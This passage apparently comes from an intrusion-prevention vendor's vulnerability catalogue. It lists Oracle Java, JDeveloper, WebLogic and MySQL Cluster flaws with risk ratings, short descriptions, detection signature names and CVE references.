Description: There is a vulnerability in Oracle Java Bytecode verifier. The vulnerability can be used by an attacker to create a type confusion or other errors in the handling of Java bytecode. A remote attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page containing a Java applet or running a Java Archive (JAR) file. Successful exploitation could allow the Java code to escape the sandbox and run in the context of the currently logged in user.
Situation: File-Zip_Oracle-Java-Runtime-Bytecode-Verifier-Cache-Code-Execution
References:
CVE-2012-1723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723
OSVDB-82877
http://www.osvdb.org/82877
Back to top

Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle JRE
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in Oracle Java Runtime. The vulnerability is due to insufficient validation of the 'count' property of the 'curveType' object in the CMM module of the Oracle JVM. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious Java applet with a vulnerable application. In a successful attack, where arbitrary code is injected and executed on the vulnerable target host, the behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker would run with the privileges of the logged in user. In an attack where code execution fails, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow
File-Binary_Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow
References:
CVE-2010-0838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838
BID-39069
http://www.securityfocus.com/bid/39069
Back to top

Oracle-Java-Runtime-Environment-Insecure-File-Loading

About this vulnerability: An attempt to exploit vulnerability in Oracle Java Runtime Environment detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Malfunction
Description: A code execution vulnerability has been reported in Oracle's Java Runtime Environment. The vulnerability is due to insecure loading of a configuration file, which can be used to set JVM options, resulting in the execution of arbitrary code or commands.
Situation: HTTP_CSU-Oracle-Java-Runtime-Environment-Insecure-File-Loading
SMB-TCP_CHS_Oracle-Java-Runtime-Environment-Insecure-File-Loading
Back to top

Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java Development Kit
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in Oracle Java Runtime. The vulnerability is due to a buffer overflow in the storeImageArray() function from jre/bin/awt.dll. A remote attacker can exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation of this vulnerability can result in the execution of arbitrary code within the context of the currently logged in user.
Situation: File-Binary_Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow
File-Zip_Oracle-Java-Runtime-Environment-Storeimagearray-Buffer-Overflow
References:
CVE-2013-2465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465
BID-60657
http://www.securityfocus.com/bid/60657
OSVDB-94339
http://www.osvdb.org/94339
Back to top

Oracle-Java-Runtime-True-Type-Font-Idef-Opcode-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: Moderate
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Buffer Overflow
Description: There exists a heap buffer overflow vulnerability in the Oracle Java Runtime.
Situation: File-Binary_Oracle-Java-Runtime-True-Type-Font-Idef-Opcode-Heap-Buffer-Overflow
References:
CVE-2012-0499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0499
BID-52016
http://www.securityfocus.com/bid/52016
OSVDB-79226
http://www.osvdb.org/79226
Back to top

Oracle-Java-Sandbox-Breach

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: Moderate
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Input Validation
Description: There exist multiple vulnerabilities in Oracle Java that allow an attacker to run arbitrary Java code outside the sandbox.
Situation: File-Binary_Oracle-Java-Sandbox-Breach
References:
CVE-2012-4681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4681
OSVDB-84867
http://www.osvdb.org/84867
Back to top

Oracle-Java-SE-Gsub-Featurecount-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java Development Kit
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Oracle Java. The vulnerability is due to the font parsing code failing to check the "FeatureCount" value of the GSUB table used in controlling heap memory allocation. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a malicious web page containing a java applet. Successful exploitation would cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.
Situation: File-Binary_Java-SE-Gsub-Featurecount-Buffer-Overflow
Back to top

Oracle-Java-SE-Gsub-Reqfeatureindex-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Oracle Java. The vulnerability is due to invalid processing of the ReqFeatureIndex entry in the GSUB table. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Binary_Oracle-Java-SE-Gsub-Reqfeatureindex-Buffer-Overflow
References:
CVE-2013-5907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5907
BID-64894
http://www.securityfocus.com/bid/64894
OSVDB-101995
http://www.osvdb.org/101995
Back to top

Oracle-Java-SE-Ligature-Substitution-Glyph-Storage-Out-Of-Bounds-Memory-Access

About this vulnerability: A vulnerability in Oracle Java SE
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java SE
Type: Malfunction
Description: An out of bounds memory access vulnerability has been reported in Oracle Java SE. The vulnerability is due to an issue with insufficient validation of an index value prior to array access. This can lead to an off by one condition in the glyphStorage heap array object. A remote unauthenticated attacker can exploit this vulnerability by persuading users to load a malicious web page containing a Java applet. Successful exploitation could cause memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application resulting in a denial of service condition.
Situation: File-Binary_Oracle-Java-SE-Ligature-Substitution-Glyph-Storage-Out-Of-Bounds-Memory-Access
References:
CVE-2015-0469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0469
BID-74072
http://www.securityfocus.com/bid/74072
OSVDB-120713
http://www.osvdb.org/120713
Back to top

Oracle-Java-SE-OCSP-Nextupdate-Replay-Attack

About this vulnerability: A vulnerability in Oracle Java SE
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java SE; Oracle Java SE Embedded; Oracle JRockit
Type: Malfunction
Description: A replay attack vulnerability exists in Oracle Java SE. The vulnerability is due to improper checking of the nextUpdate field in an OCSP response. An unauthenticated, MiTM attacker may exploit this vulnerability by replaying an old OCSP response to trick a vulnerable Java application into accepting a revoked certificate when the application attempts to verify the the revoked certificate with OCSP.
Situation: File-Binary_Oracle-Java-SE-OCSP-Nextupdate-Replay-Attack
References:
CVE-2015-4748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4748
Back to top

Oracle-Java-SE-XML-Digital-Signature-Spoofing

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Input Validation
Description: A spoofing vulnerability has been reported in Oracle Java SE. The vulnerability is due to improper use of Canonicalization algorithm while validating the signature of a specially crafted XML file. An attacker can exploit this vulnerability to modify the content of an XML file without invalidating the signature associated with the file.
Situation: File-TextId_Microsoft-.NET-And-Oracle-Java-SE-Xml-Digital-Signature-Spoofing
References:
CVE-2013-2461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2461
BID-60645
http://www.securityfocus.com/bid/60645
OSVDB-94350
http://www.osvdb.org/94350
Back to top

Oracle-Java-Security-Bybass-Vulnerability-CVE-2013-0422

About this vulnerability: A vulnerability in Oracle Java Runtime Environment
Risk: High
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Malfunction
Description: There is a vulnerability in Oracle Java Runtime Environment that allows remote code execution.
Situation: File-Binary_Oracle-Java-Security-Bybass-Vulnerability-CVE-2013-0422
References:
CVE-2013-0422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422
BID-57246
http://www.securityfocus.com/bid/57246
OSVDB-89059
http://www.osvdb.org/89059
Back to top

Oracle-Java-Security-Slider-Feature-Bypass

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java Development Kit
Type: Malfunction
Description: A security feature bypass vulnerability exists in Oracle Java JRE. The vulnerability occurs when a serialized class is loaded via the applet tag object attribute. This allows an attacker to run an unsigned Java applet without prompting, regardless of Java security settings. A remote attacker can exploit this vulnerability to bypass warning prompts by enticing user to open a Java applet embedded in a webpage.
Situation: File-Text_Oracle-Java-Security-Slider-Feature-Bypass
References:
CVE-2013-1489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1489
OSVDB-89718
http://www.osvdb.org/89718
Back to top

Oracle-Java-Serviceloader-Exception-Handling-Sandbox-Bypass

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java SE Embedded; Oracle JRockit; Oracle Java Development Kit
Type: Malfunction
Description: A sandbox bypass vulnerability exists in Oracle Java. The vulnerability is due to a flaw in exception handling of the ServiceLoader class. This flaw could be used to disable the security manager and run Java code with full privileges. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-Binary_Oracle-Java-Serviceloader-Exception-Handling-Sandbox-Bypass
References:
CVE-2014-0457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0457
BID-66866
http://www.securityfocus.com/bid/66866
OSVDB-105867
http://www.osvdb.org/105867
Back to top

Oracle-Java-Soundbank-Resource-Name-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Java SE and Java for Business
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java SE
Type: Buffer Overflow
Description: There exists a stack buffer overflow in Oracle Java Runtime.
Situation: File-Binary_Oracle-Java-Soundbank-Resource-Name-Stack-Buffer-Overflow
References:
CVE-2010-0839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839
BID-39070
http://www.securityfocus.com/bid/39070
Back to top

Oracle-Java-Statistics.impl-Package-Sandbox-Breach

About this vulnerability: A vulnerability in Oracle JDK and JRE
Risk: Moderate
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle JDK
Type: Input Validation
Description: There exists a sandbox breach vulnerability in Oracle Java.
Situation: File-Binary_Oracle-Java-Com.sun.org.glassfish.external.statistics.impl-Package-Sandbox-Breach
References:
CVE-2012-5076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5076
BID-56054
http://www.securityfocus.com/bid/56054
OSVDB-86350
http://www.osvdb.org/86350
Back to top

Oracle-Java-Sun.awt.image.imagerepresentation.setpixels-Integer-Overflow

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in Oracle Java. The vulnerability is due to improper validation of image and raster dimensions in the sun.awt.image.ImageRepresentation.setPixels method. A remote attacker can exploit this vulnerability by enticing the target user to visit a specially crafted web page. Successful exploitation of this vulnerability can allow execution of arbitrary code on a target system.
Situation: File-Zip_Oracle-Java-Sun.awt.image.imagerepresentation.setpixels-Integer-Overflow
References:
CVE-2013-2420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2420
OSVDB-92339
http://www.osvdb.org/92339
Back to top

Oracle-Java-Sun.awt.image.imaginglib.lookupbytebi-Memory-Corruption

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Malfunction
Description: A memory corruption vulnerability exists in Oracle Java. The vulnerability is due to access of uninitialized memory during a call to sun.awt.image.ImagingLib.lookupByteBI method. A remote attacker can exploit this vulnerability by enticing the target user to visit a specially crafted web page. Successful exploitation of this vulnerability can allow execution of arbitrary code on a target system.
Situation: File-Binary_Oracle-Java-Sun.awt.image.imaginglib.lookupbytebi-Memory-Corruption
References:
CVE-2013-2470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470
BID-60651
http://www.securityfocus.com/bid/60651
OSVDB-94356
http://www.osvdb.org/94356
Back to top

Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Malfunction
Description: There is a sandbox bypass vulnerability in Oracle Java. The vulnerability is due to an insecure invoke() method of the sun.tracing.ProviderSkeleton class. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Binary_Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass
File-Zip_Oracle-Java-Sun.tracing.providerskeleton-Sandbox-Bypass
References:
CVE-2013-2460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2460
BID-60635
http://www.securityfocus.com/bid/60635
OSVDB-94346
http://www.osvdb.org/94346
Back to top

Oracle-Java-System.arraycopy-Race-Condition

About this vulnerability: A vulnerability in Oracle Java SE
Risk: High
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java SE Embedded
Type: Malfunction
Description: A code execution vulnerability exists in Oracle Java. The vulnerability is due to a race condition in System.arraycopy(). This flaw could be used to disable the security manager and run Java code with full privileges. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a webpage containing a maliciously crafted Java applet. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-Binary_Oracle-Java-System.arraycopy-Race-Condition
References:
CVE-2014-0456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0456
OSVDB-105868
http://www.osvdb.org/105868
Back to top

Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error

About this vulnerability: A vulnerability in Oracle Java Development Kit (JDK)
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Oracle Java Runtime Environment
Type: Malfunction
Description: A code execution vulnerability has been reported in Oracle Java Web Start. The vulnerability is due to memory corruption in javaws.exe, a helper application executed from the launchApp() method of the JWS ActiveX control. An attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation of this vulnerability can crash the vulnerable application creating a denial-of-service condition and could possibly be exploited to execute malicious code.
Situation: File-Text_Oracle-Java-Web-Start-ActiveX-Control-Vulnerable-Method-Usage
File-Text_Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error
References:
CVE-2013-2416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2416
OSVDB-92337
http://www.osvdb.org/92337
Back to top

Oracle-Java-Web-Start-Command-Argument-Injection-Remote-Code-Execution

About this vulnerability: A vulnerability in Oracle Sun Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle Java Development Kit
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Oracle Java Web Start. The vulnerability is due to insufficient validation of parameters sent to the java process. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code with the privileges of the current user on the affected system.
Situation: File-TextId_Oracle-Java-Web-Start-Argument-Injection-Remote-Code-Execution
References:
CVE-2012-0500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0500
BID-52015
http://www.securityfocus.com/bid/52015
OSVDB-79227
http://www.osvdb.org/79227
Back to top

Oracle-Java-Xgetsampleptrfromsnd-Memory-Corruption

About this vulnerability: A vulnerability in Oracle Java for Business
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment
Type: Malfunction
Description: A memory corruption vulnerability exists within Oracle JRE and JDK. The flaw is due to an input validation error within jsound!XGetSamplePtrFromSnd while processing user supplied Soundbank data. By enticing a target user to run a Java applet or a Java Web Start application, a remote attacker can exploit this vulnerability to execute arbitrary code on a target system. Successful exploitation could result in execution of arbitrary code within the security context of the current user.
Situation: File-Binary_Oracle-Java-Xgetsampleptrfromsnd-Memory-Corruption
References:
CVE-2010-4462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4462
Back to top

Oracle-Java-Zip_Util-Readcen-Stack-Overflow

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: Moderate
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment; Oracle OpenJDK; Oracle Java Development Kit
Type: Malfunction
Description: A denial-of-service vulnerability has been discovered in the JRE. The vulnerability is due to an off-by-one error when processing zip archives. This results in a series of recursive calls, terminated by a stack overflow / segmentation fault. An attacker can exploit this vulnerability by causing an application to process a crafted zip archive. The exact nature of an attack will depend on the application's context.
Situation: File-Zip_Oracle-Java-Zip_Util-Readcen-Stack-Overflow
References:
CVE-2012-0501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0501
BID-52013
http://www.securityfocus.com/bid/52013
OSVDB-79228
http://www.osvdb.org/79228
Back to top

Oracle-JDeveloper-ADF-Faces-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle JDeveloper ADF Faces
Risk: High
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle JDeveloper
Type: Input Validation
Description: There exists a vulnerability in Oracle JDeveloper ADF Faces, versions 11.1.1.9.0, 12.1.3.0.0, 12.2.1.3.0, which allows remote attackers to execute arbitrary code due to the insufficient validation of HTTP requests.
Situation: HTTP_CS-Oracle-JDeveloper-ADF-Faces-Insecure-Deserialization
References:
CVE-2019-2904
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2904
Back to top

Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle JDeveloper
Risk: High
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1830-5242
Platform: Generic
Software: Oracle JDeveloper
Type: Input Validation
Description: A vulnerability in Oracle JDeveloper, versions 12.2.1.3.0 and 12.2.1.4.0, which allows remote attackers to execute arbitrary code by sending crafted requets, due to the insufficient validation of HTTP requests referencing resources rendered from a remote region.
Situation: HTTP_CSU-Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization
HTTP_SHS-Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization
References:
CVE-2022-21445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21445
Back to top

Oracle-JRE-Shortcomponentraster.verify-Memory-Corruption

About this vulnerability: A vulnerability in Oracle Java Runtime Environment (JRE)
Risk: High
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Runtime Environment;Oracle Java Development Kit
Type: Malfunction
Description: A memory corruption vulnerability exists in Oracle's Java Runtime. The vulnerability is due to insufficient input validation on ShortComponentRaster.verify() method parameters which will lead to bypassing of "dataOffsets[0]" boundary checks when the "numDataElements" field is 0. A remote attacker can exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation of this vulnerability can result in the execution of arbitrary code within the context of the currently logged in user.
Situation: File-Zip_Oracle-JRE-Shortcomponentraster.verify-Memory-Corruption
References:
CVE-2013-2472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472
OSVDB-94335
http://www.osvdb.org/94335
Back to top

Oracle-Multiple-Products-Hash-Collision-Denial-of-Service

About this vulnerability: A vulnerability in multiple Oracle products
Risk: High
First detected in: sgpkg-ips-439-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Server 10g; Oracle WebLogic Server; Oracle iPlanet Web Server; Oracle Java System Web Server
Type: Malfunction
Description: There is a denial-of-service vulnerability in Oracle WebLogic Server, Oracle Application Server (OC4J) and Oracle iPlanet Web Server. The vulnerability is due to the use of non-randomized hash functions, making it possible to purposely create collisions in hash tables. A remote unauthenticated attacker can exploit this vulnerability to consume large amounts of CPU time on the application server by sending malicious requests to the server.
Situation: HTTP_CS-Large-Number-Of-Parameters-In-POST-Request
HTTP_CRL-Too-Many-Parameters-In-GET-Request
References:
CVE-2011-5035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5035
BID-51194
http://www.securityfocus.com/bid/51194
Back to top

Oracle-MySQL-Authentication-Integer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL Server
Risk: Moderate
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Integer Overflow
Description: An integer overflow in the Pluggable Authentication module of MySQL causes a vulnerability which an attacker can exploit to cause a denial of service condition on the target system.
Situation: MySQL_Oracle-MySQL-Authentication-Integer-Overflow
References:
CVE-2017-3599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3599
BID-97754
http://www.securityfocus.com/bid/97754
Back to top

Oracle-Mysql-Client-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL Client
Risk: High
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle MySQL Client
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability has been reported in Oracle MySQL Client. This vulnerability is due to insufficient validation of the server's version string. A remote unauthenticated attacker can exploit this vulnerability by enticing the user to connect to a malicious server. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: MySQL_SS-Oracle-Mysql-Client-Heap-Buffer-Overflow
References:
CVE-2014-0001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0001
BID-65298
http://www.securityfocus.com/bid/65298
OSVDB-102713
http://www.osvdb.org/102713
Back to top

Oracle-MySQL-Cluster-Data-Node-GSN_cm_regref-Handling-Remote-Code-Execution

About this vulnerability: A vulnerability in Oracle MySQL Cluster
Risk: Moderate
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: Improper handling of GSN_CM_REGREF signals causes an index boundary error in MySQL. A successful attack may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_cm_regref-Handling-Remote-Code-Execution
References:
CVE-2021-35598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35598
Back to top

Oracle-MySQL-Cluster-Data-Node-GSN_continueb-Handling-Remote-Code-Execution

About this vulnerability: A vulnerability in Oracle MySQL Cluster
Risk: High
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Generic
Software: Oracle MySQL Cluster
Type: Malfunction
Description: An index boundary error has been reported in Oracle MySQL. The vulnerability exists in the MySQL NDB Cluster component when handling GSN_CONTINUEB signals. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to the vulnerable server. Successful exploitation will allow an attacker to execute arbitrary code in the context of the application.
Situation: Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_continueb-Handling-Remote-Code-Execution
References:
CVE-2021-35594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35594
Back to top

Oracle-MySQL-Cluster-Data-Node-GSN_Processinfo_Rep-Remote-Code-Execution

About this vulnerability: A vulnerability in Oracle MySQL Cluster
Risk: Moderate
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Platform: Generic
Software: MySQL
Type: Malfunction
Description: Improper handling of GSN_PROCESSINFO_REP signals causes an index boundary error in MySQL. A successful attack may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Oracle-Mysql-Cluster-Data-Node-GSN_Processinfo_Rep-Handling-Remote-Code-Execution
References:
CVE-2021-35592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35592
Back to top

Oracle-MySQL-Cluster-Data-Node-GSN_Sync_path_req-Parsing-Integer-Underflow

About this vulnerability: A vulnerability in Oracle MySQL Cluster
Risk: Moderate
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Platform: Generic
Software: Oracle MySQL Cluster
Type: Integer Overflow
Description: Lack of proper validation of user supplied data causes an integer underflow vulnerability in MySQL. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_Sync_path_req-Parsing-Integer-Underflow
References:
CVE-2022-21550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21550
Back to top

Oracle-MySQL-Cluster-Data-Node-GSN_TRIG_ATTRINFO-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL.
Risk: High
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Platform: Generic
Software: Oracle MySQL Cluster
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Oracle MySQL, versions 7.4.33 and before, 7.5.23 and before, 7.6.19 and before, 8.0.26 and before, in the MySQL NDB Cluster component when handling GSN_TRIG_ATTRINFO signals, which allows remote attackers to execute arbitrary code by sending a crafted packet to the target server.
Situation: Generic_CS-Oracle-MySQL-Cluster-Data-Node-GSN_TRIG_ATTRINFO-Handling-Buffer-Overflow
References:
CVE-2021-35621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35621
Back to top

Oracle-MySQL-Cluster-GSN_CREATE_FRAGMENTATION_REQ-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL Cluster.
Risk: High
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Generic
Software: Oracle MySQL Cluster
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Oracle MySQL Cluster, versions 7.4.35 and prior, 7.5.25 and prior, 7.6.21 and prior, 8.0.28 and prior, in the MySQL NDB Cluster component when handling GSN_CREATE_FRAGMENTATION_REQ signals, which allows remote attackers to execute arbitrary code by sending a crafted packet to the vulnerable server.
Situation: Generic_CS-Oracle-MySQL-Cluster-GSN_CREATE_FRAGMENTATION_REQ-Buffer-Overflow
References:
CVE-2022-21489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21489
Back to top

Oracle-MySQL-Cluster-GSN_CREATE_NODEGROUP_IMPL_REQ-RCE

About this vulnerability: A vulnerability in Oracle MySQL.
Risk: High
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Platform: Generic
Software: Oracle MySQL Cluster
Type: Malfunction
Description: A vulnerability in Oracle MySQL Cluster, versions 7.4.35 and prior, 7.5.25 and prior, 7.6.21 and prior, 8.0.28 and prior, which allows remote attackers to execute arbitrary code by sending crafted packets, due to an index boudary error in the MySQL NDB Cluster component when handling GSN_CREATE_NODEGROUP_IMPL_REQ signals.
Situation: Generic_TCP-Oracle-MySQL-Cluster-GSN_CREATE_NODEGROUP_IMPL_REQ-RCE
References:
CVE-2022-21490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21490
Back to top

Oracle-MySQL-Cluster-Management-API-dumpState-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle MySQL Cluster.
Risk: High
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Platform: Generic
Software: Oracle MySQL Cluster
Type: Buffer Overflow
